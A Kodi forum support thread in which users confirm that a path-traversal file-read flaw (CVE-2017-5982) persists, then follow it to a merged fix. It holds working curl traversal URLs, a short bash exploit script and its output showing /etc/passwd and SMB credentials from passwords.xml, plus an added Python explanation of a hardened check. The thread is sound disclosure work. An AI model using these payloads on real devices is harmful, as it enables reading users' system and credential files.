Kodi Community Forum
Local File Include (CVE-2017-5982) is back - Printable Version

+- Kodi Community Forum (https://forum.kodi.tv)
+-- Forum: Support (https://forum.kodi.tv/forumdisplay.php?fid=33)
+--- Forum: General Support (https://forum.kodi.tv/forumdisplay.php?fid=111)
+---- Forum: OS independent / Other (https://forum.kodi.tv/forumdisplay.php?fid=228)
+---- Thread: Local File Include (CVE-2017-5982) is back (/showthread.php?tid=335695)



Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-20

I believe the Local File Include (CVE-2017-5982) is back.

I know that bool CFileUtils::ZebraListAccessCheck(const std::string &filePath) from xbmc/xbmc/utils/FileUtils.cpp is supposed to block access, but it doesn't.

The code from: 
https://www.exploit-db.com/exploits/41312/

Still works on:
NOTICE: Starting Kodi (17.6). Platform: Linux ARM (Thumb) 32-bit
NOTICE: Using Release Kodi x32 build (version for Raspberry Pi)
Kodi compiled Jun  7 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478)


http://pi/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml
<passwords>
    <path>
        <from pathversion="1">smb://smb/media</from>
        <to pathversion="1">smb://username:password@smb/media/</to>
    </path>
</passwords>


RE: Local File Include (CVE-2017-5982) is back - popcornmix - 2018-09-21

Can you test a Kodi 18 nightly build? There have been no changes to Kodi 17 for many months.


RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-21

I will test tonight.


RE: Local File Include (CVE-2017-5982) is back - Sam.Nazarko - 2018-09-21

You can grab a nightly here: https://discourse.osmc.tv/t/testing-kodi-18-leia-builds-for-raspberry-pi/20631 if you wish to test with OSMC still for consistency.


RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-22

On OSMC it still exists:
22:31:01.228 T:1918357504  NOTICE: Starting Kodi (18.0-BETA3). Platform: Linux ARM (Thumb) 32-bit
22:31:01.229 T:1918357504  NOTICE: Using Release Kodi x32 build (version for Raspberry Pi)
22:31:01.229 T:1918357504  NOTICE: Kodi compiled Sep 20 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478)

curl http://kodi/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:104:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
ntp:x:105:107::/home/ntp:/bin/false
messagebus:x:106:108::/var/run/dbus:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
avahi:x:108:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
osmc:x:1000:1000::/home/osmc:/bin/bash


RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-22

I did a test on a "plain" Kodi 18.0-BETA3 Git:2018921-a2133e4 running on Ubuntu 18.04.1 LTS (kernel: Linux 4.15.0-34-generic) and did not see the vulnerability.

curl http://kodi:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
<html><head><title>File not found</title></head><body>File not found</body></html>

Unless it was fixed between 18.0-BETA3 compiled Sep 20 2018 and 18.0-BETA3 Git:2018921-a2133e4, I will check with OSMC to see what they are adding that is causing the vulnerability to be seen.


RE: Local File Include (CVE-2017-5982) is back - Sam.Nazarko - 2018-09-22

We haven't got any patches here that should introduce this vulnerability.
Try with a file in the Ubuntu user's home folder, as /etc/passwd may simply be inaccessible if running as an unprivileged user.


RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-24

@Sam.Nazarko 

The bigger issue is this one:

curl http://kodi/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml
<passwords>
    <path>
        <from pathversion="1">smb://smb/media</from>
        <to pathversion="1">smb://smbuser:password@smb/media/Pictures/</to>
    </path>
</passwords>


I replaced my server name with "smb", the user with "smbuser", and the password with "password" because I'm not posting those on the site.


RE: Local File Include (CVE-2017-5982) is back - Milhouse - 2018-09-24

This issue has never been fixed to my knowledge, and affects all platforms and not just OSMC.

Ubuntu with latest Kodi 18 *is* vulnerable.

Test script ("kvuln"):

#!/bin/bash

HOST="$1"
XPATH="$2"
XPATH="${XPATH//\//%2F}"
XPATH="${XPATH//%/%25}"

curl -s "http://${HOST}/image/image%3A%2F%2F..${BASE}${XPATH}"


neil@nm-linux:~/projects$ uname -a
Linux nm-linux 4.13.0-46-generic #51-Ubuntu SMP Tue Jun 12 12:36:29 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
neil@nm-linux:~/projects$ /freenas/data/kvuln localhost:8080 /../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

special://envhome is /home/neil, and paths to be exploited are relative to that root.

An attempt to fix CVE-2017-5982 was proposed but never implemented: https://github.com/xbmc/xbmc/pull/11851

If anything else in this area has been implemented (can't find anything) then it is now a regression.

I'll move this thread to OS Independent/Other.
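The mechanism Milhouse's script relies on is that the file path inside image:// gets percent-decoded a second time after the HTTP layer has already decoded the request once, so a check performed on the once-decoded string never sees the traversal. The Python below is an added illustration of that decoding chain and of an allow-list check on the fully decoded, normalised path; it is not Kodi's code, and the root directory, allowed directories, the "weak" check and the sample requests are all constructed for the example (the request shapes follow the curl commands posted in this thread).

```python
"""
Added example (not Kodi code): double-decoded image:// paths versus a
check on the normalised path. All roots and requests are constructed.
"""
import posixpath
from urllib.parse import unquote

# Constructed: root that relative image:// paths are assumed to resolve
# against (Milhouse reports that, in Kodi, this is special://envhome).
HOME_ROOT = "/home/kodi"

# Constructed allow-list: the only directories image requests may read.
ALLOWED_ROOTS = (
    "/home/kodi/.kodi/userdata/Thumbnails",
    "/home/kodi/Pictures",
)

IMAGE_PREFIX = "/image/image://"


def decode_once(request_path: str) -> str:
    """Stage 1: the HTTP layer percent-decodes the request path once and
    hands the part after image:// to the protocol handler still encoded.
    '/image/image%3A%2F%2F..%252Fetc%252Fpasswd' -> '..%2Fetc%2Fpasswd'
    """
    once = unquote(request_path)
    if not once.startswith(IMAGE_PREFIX):
        raise ValueError("not an image:// request")
    return once[len(IMAGE_PREFIX):]


def decode_image_url(request_path: str) -> str:
    """Stage 2: the image:// handler decodes its embedded path again.
    '..%2Fetc%2Fpasswd' -> '../etc/passwd'
    """
    return unquote(decode_once(request_path))


def weak_allows(request_path: str) -> bool:
    """Illustrative weak check (constructed, not Kodi's): inspects the
    once-decoded string for traversal. '%2F' is not '/', so nothing in
    '..%2F..%2Fetc%2Fpasswd' trips it."""
    inner = decode_once(request_path)
    return not (inner.startswith("/") or inner.startswith("../") or "/../" in inner)


def resolve(inner_path: str, root: str = HOME_ROOT) -> str:
    """Resolve the fully decoded path the way the filesystem would:
    absolute paths stand alone, relative ones are joined to the root,
    and '..' segments are collapsed lexically."""
    candidate = inner_path if inner_path.startswith("/") else posixpath.join(root, inner_path)
    return posixpath.normpath(candidate)


def hardened_allows(request_path: str, roots=ALLOWED_ROOTS) -> bool:
    """Decode completely, normalise, then require the result to lie
    inside an allowed root. Allow-list on the final path, not a
    blocklist on an intermediate encoding."""
    try:
        resolved = resolve(decode_image_url(request_path))
    except ValueError:
        return False
    for root in roots:
        root = posixpath.normpath(root)
        if resolved == root or resolved.startswith(root + "/"):
            return True
    return False


if __name__ == "__main__":
    # Constructed requests: the kvuln-style traversal from this thread,
    # the passwords.xml request, an absolute path, and a benign picture.
    samples = [
        "/image/image%3A%2F%2F..%252F..%252F..%252Fetc%252Fpasswd",
        "/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml",
        "/image/image%3A%2F%2F%252fetc%252fpasswd",
        "/image/image%3A%2F%2FPictures%252fcat.jpg",
    ]
    for req in samples:
        print(f"{resolve(decode_image_url(req)):50} weak={weak_allows(req)!s:5} hardened={hardened_allows(req)}")
```

The normalisation here is purely lexical; a real handler should additionally open the file and compare its realpath (symlinks resolved) against the allow-list, since a symlink inside an allowed directory can otherwise point anywhere.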


RE: Local File Include (CVE-2017-5982) is back - yol - 2018-10-03

Fix is underway

https://github.com/xbmc/xbmc/pull/14501


RE: Local File Include (CVE-2017-5982) is back - yol - 2018-10-14

fyi: Fix merged